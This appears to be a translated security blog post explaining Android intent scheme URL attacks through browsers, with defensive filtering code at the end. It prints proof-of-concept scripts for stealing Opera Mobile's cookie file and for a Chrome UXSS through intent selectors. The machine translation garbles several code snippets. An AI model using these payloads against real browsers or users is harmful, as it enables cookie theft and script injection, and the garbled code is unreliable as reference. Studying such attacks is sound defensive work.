Android Intent Scheme URLs attack

0x0 Introduction

We know that intent-based attacks on Android are common, and that this kind of attack can cause the application to crash, and that it may evolve to exploit the rights. Of course, intent-based's malicious samples can be easily identified by static feature matching.

However, there has been a recent attack on an Android browser-based attack--intent Scheme URLs. This attack takes advantage of the lack of browser protection, and indirectly realizes the intend-based attack through the browser as a bridge. This is a very covert approach compared to ordinary intend-based attacks, and traditional feature matching is completely ineffective due to malicious code hiding webpage. In addition, this attack can also directly access the browser's own components (whether public or private) and private files, such as cookie files, resulting in the disclosure of user confidential information.

the use of the 0x1 Intent scheme URL

Take a look at the use of the intent Scheme URL.

<script>location.href = "Intent:mydata#intent;action=myaction;type=text/plain;end" </script>

From the usage point of view, it is well understood that the code here is equivalent to the following Java code:

Intent Intent = new Intent ("myaction"); Intent.setdata (Uri.parse ("MyData")); Intent.settype ("Text/plain");

Let's look at an example:

intent://foobar/#Intent; action=myaction;type=text/plain; S.xyz=123;i.abc=678;end

The above statement is equivalent to the following Java code:

Intent Intent = new Intent ("Myaction"), Intent.setdata (Uri.pase ("//foobar/")), Intent.putextra ("xyz", "123"); Intent.putextra ("abc", 678);

where s represents a string of type key-value,i represents an int of type Key-value.

Intent.parseuri (String uri) static method is provided in the source code, this method can directly parse the URI, if you want to know more about the syntax, you can view the official source code.

0x2 Intent Scheme URI parsing and filtering

If the browser supports the intent Scheme URI syntax, it is generally handled in three steps:

1. Using Intent.parseuri to parse the URI, get the original intent object;
2. Set the filter rules for intent objects, different browsers have different policies, the following will be described in detail;
3. Send intent through context.startactivityifneeded or context.startactivity;

The key role of step 2, the absence of filtering rules or the presence of defects can lead to intent Schem URL attacks.

The following are the major browsers for the intent Scheme URL support situation

The intent Scheme URL syntax is supported in browsers other than Firefox.

0x3 Attack ExampleA.opera Mobile's Cookie theft

Opera's intent filtering strategy is completely missing, so we can easily invoke the private activity on opera. For example, the following attack:

<script>location.href = "intent: #Intent; s.url=file:///data/data/com.opera.browser/app_opera/cookies;component=com.opera.browser/ Com.admarvel.android.ads.admarvelactivity;end ";</script>

Through the above script, we can directly adjust the admarvelactivity. Admarvelactvity will retrieve the URL from the intent and parse the cookie file in Html/javascript way.

Imagine if we pre-constructed a malicious website and let the user access it through a browser. At this time in the malicious encounter, the following script exists:

<script>document.cookie = "x=<script> (JavaScript code) </SCR" + "ipt>; Path=/blah; Expires=tue, 01-jan-2030 00:00:00 GMT "; location.href =" intent: #Intent; s.url=file:///data/data/com.opera.browser/app_opera/cookies;component=com.opera.browser/ Com.admarvel.android.ads.admarvelactivity;end ";</script>

When admarvelactivity parses a cookie file, it executes playload.

the UXSS of B.chrome

Chrome's UXSS exploits are relatively complex. Before we introduce, we need to understand the usage of intent selector, see the details. In short, the Intent selector mechanism provides a scenario where a main Intent mismatch can be set to a substitute. For example A is main intent, B is a selector intent, when Startactiviy, the system found that a can not match will try to match with B.

Compared to opera, Chrome adds a security policy to the intent filtering step, with the following code:

Intent Intent = Intent.parseuri (URI); Intent.addcategory ("Android.intent.category.BROWSABLE"); Intent.setcomponent ( NULL); context.startactivityifneeded (Intent,-1);

From the code, you can see that chrome to defend against the intent based attack, made a number of restrictions, such as the category is strongly set to "Android.intent.category.BROWSABLE", the component is strong to NULL, It's much better than opera. However, Chrome ignores the use of intent selector, such as the following:

Intent: #Intent; s.xxx=123; Sel;component=com.android.chrome/.xyz;end

Note that the keyword "SEL", in fact, is set up a component for COM.ANDROID.CHROME/.XYZ selector Intent, this usage led to Chrome's defensive measures are not the same. Finally, take a look at the POC for Chrome UXSS:

<script>//through WebAppActivity0 We first open an attacking site Location.href = "intent: #Intent; S.webapp_url=http://victim.example.jp;l.webapp_id=0; Sel;compo nent=com.android.chrome/com.google.android.apps.chrome.webapps.webappactivity0;end ";//stay 2s or longer, Then inject JavaScript payloadsettimeout (function () {location.href = "intent: #Intent; S.webapp_url=javascript: (malicious JavaScript code); l.webapp_id=1; Sel;component=com.android.chrome/com.google.android.apps.chrome.webapps.webappactivity0;end ";}, 2000); </script>

The key point here is WebappActivity0 's approach to new intent.

Open the site for the first time and finish loading. The second time is to inject JavaScript payload directly into the target Web page. This vulnerability exists in all versions of Chrome that are below v.30.0.1599.92, and the new version modifies how webappactivity handles new intent, creating new tab, which avoids JavaScript inject.

However, in the new version, there is still no screen to avoid the use of intent selector, so there is still chrome's private components and files are read security implications.

0x4 Conclusion

Through the description of the two vulnerabilities, we conclude a relatively safe intent filter method, the code is as follows:

Convert Intent Scheme URL to intent objectintent intent = Intent.parseuri (URI);//forbid launching activities without B Rowsable categoryintent.addcategory ("Android.intent.category.BROWSABLE");//Forbid explicit Callintent.setcomponent (null);//forbid intent with selector intentintent.setselector (null);//Start the activity by the Intentcontext.startactivityifneeded (Intent,-1);